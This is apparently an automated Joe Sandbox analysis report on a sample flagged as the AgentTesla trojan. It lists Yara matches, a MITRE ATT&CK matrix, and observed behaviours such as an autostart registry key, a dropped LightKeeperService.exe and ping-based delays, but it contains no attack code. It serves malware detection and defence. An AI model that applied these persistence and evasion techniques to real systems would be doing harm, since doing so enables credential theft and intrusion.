                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\atpRyiZGTE.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: Process Memory Space: atpRyiZGTE.exe PID: 3452, type: MEMORYSTR
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: atpRyiZGTE.exe PID: 3452, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: 0.2.atpRyiZGTE.exe.49762aa.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4aac2da.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4a112ca.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4c7d2e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4aac2da.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4be22da.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4a112ca.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.4be22da.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.atpRyiZGTE.exe.49762aa.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.450115307.0000000004BE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.448862255.00000000048DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: atpRyiZGTE.exe PID: 3452, type: MEMORYSTR

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 11 Security Software Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 11 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Disable or Modify Tools | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 2 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 21 Virtualization/Sandbox Evasion | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 3 Application Layer Protocol | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Process Injection | LSA Secrets | 11 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 1 Hidden Files and Directories | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Obfuscated Files or Information | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Behavior Graph (ID: 652396; Sample: atpRyiZGTE.exe; Start date: 26/06/2022; Architecture: WINDOWS; Score: 96)

Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Start
  Signatures: Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 3 other signatures
  started: atpRyiZGTE.exe 15 3
    DNS/IP: www.google.com 142.250.185.100, 443, 49746 GOOGLEUS United States
    dropped: C:\Users\user\AppData\...\atpRyiZGTE.exe.log, ASCII
    Signatures: Hides that the sample has been downloaded from the Internet (zone.identifier)
    started: cmd.exe 1
      Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
      started: reg.exe 1 1
        Signatures: Creates an undocumented autostart registry key
      started: PING.EXE 1
        DNS/IP: 127.0.0.1 unknown unknown; 192.168.2.1 unknown unknown
      started: conhost.exe
    started: cmd.exe 3
      dropped: C:\Users\user\...\LightKeeperService.exe, PE32; C:\...\LightKeeperService.exe:Zone.Identifier, ASCII
      started: conhost.exe
      started: PING.EXE 1
      started: PING.EXE

Source | Detection | Scanner | Label | Link
atpRyiZGTE.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
atpRyiZGTE.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\LightKeeperService.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\LightKeeperService.exe | 42% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.ascendercorp.com/typedesigners.htmlG | 0% | Avira URL Cloud | safe |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.fontbureau.coma | 0% | URL Reputation | safe |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.sakkal.comr | 0% | URL Reputation | safe |
https://www.google.comT | 0% | Avira URL Cloud | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://ns.adp/1.0/ | 0% | Avira URL Cloud | safe |
http://www.fontbureau.como | 0% | URL Reputation | safe |
https://www.google.com%BorderColorFocused | 0% | Avira URL Cloud | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.urwpp.deEv | 0% | Avira URL Cloud | safe |
http://www.ascendercorp.com/typedesigners.html | 0% | URL Reputation | safe |
http://ns.microsoto/1.2 | 0% | Avira URL Cloud | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.urwpp.de | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.185.100 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://www.google.com/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295467627.0000000006850000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295597676.0000000006845000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295438765.0000000006845000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ascendercorp.com/typedesigners.htmlG | atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.goodfont.co.kr | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.coma | atpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com | atpRyiZGTE.exe, atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/i | atpRyiZGTE.exe, 00000000.00000003.295735340.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295655832.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.295687027.0000000006846000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/cabarga.htmlN | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312675141.0000000006814000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.comr | atpRyiZGTE.exe, 00000000.00000003.299475642.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300737819.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300455988.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300935758.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300039387.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.301161307.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300667068.0000000006814000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.comT | atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers/cabarga.html | atpRyiZGTE.exe, 00000000.00000003.314251572.0000000006846000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://ns.adp/1.0/ | atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.como | atpRyiZGTE.exe, 00000000.00000002.452188664.0000000006800000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.google.com%BorderColorFocused | atpRyiZGTE.exe, LightKeeperService.exe.19.dr | false | Avira URL Cloud: safe | low
http://www.galapagosdesign.com/DPlease | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deEv | atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers8 | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.ascendercorp.com/typedesigners.html | atpRyiZGTE.exe, 00000000.00000003.299802336.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.299334032.0000000006859000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.298764281.0000000006846000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.300440687.0000000006859000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-user.html8 | atpRyiZGTE.exe, 00000000.00000003.312783150.0000000006855000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.312649918.0000000006855000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ns.microsoto/1.2 | atpRyiZGTE.exe, 00000000.00000003.348966637.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.337172932.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.334588359.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335558240.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.440305727.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341919239.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.348472153.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.341573864.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.345775535.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.340929865.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.438770547.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.343342627.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.342714698.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.344471615.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.353915669.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.351717491.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.347097585.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.336546347.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.354548458.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.352972101.0000000006887000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.335252277.0000000006887000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fonts.com | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.de | atpRyiZGTE.exe, 00000000.00000003.309958195.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309784943.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315674707.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310013124.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.315753789.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.310158459.0000000006814000.00000004.00000800.00020000.00000000.sdmp, atpRyiZGTE.exe, 00000000.00000003.309902011.0000000006814000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | atpRyiZGTE.exe, 00000000.00000002.445054854.0000000002EA1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sakkal.com | atpRyiZGTE.exe, 00000000.00000002.454472741.000000000A742000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.185.100 | www.google.com | United States | | 15169 | GOOGLEUS | false

IP
192.168.2.1
127.0.0.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 652396
Start date and time: 26/06/2022 09:46:56 (2022-06-26 09:46:56 +02:00)
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 57s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: atpRyiZGTE.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 31
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal96.troj.evad.winEXE@15/5@1/3
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 0.1% (good quality ratio 0.1%)
• Quality average: 84.5%
• Quality standard deviation: 1.5%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Adjust boot time
• Enable AMSI
• Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.223.24.244
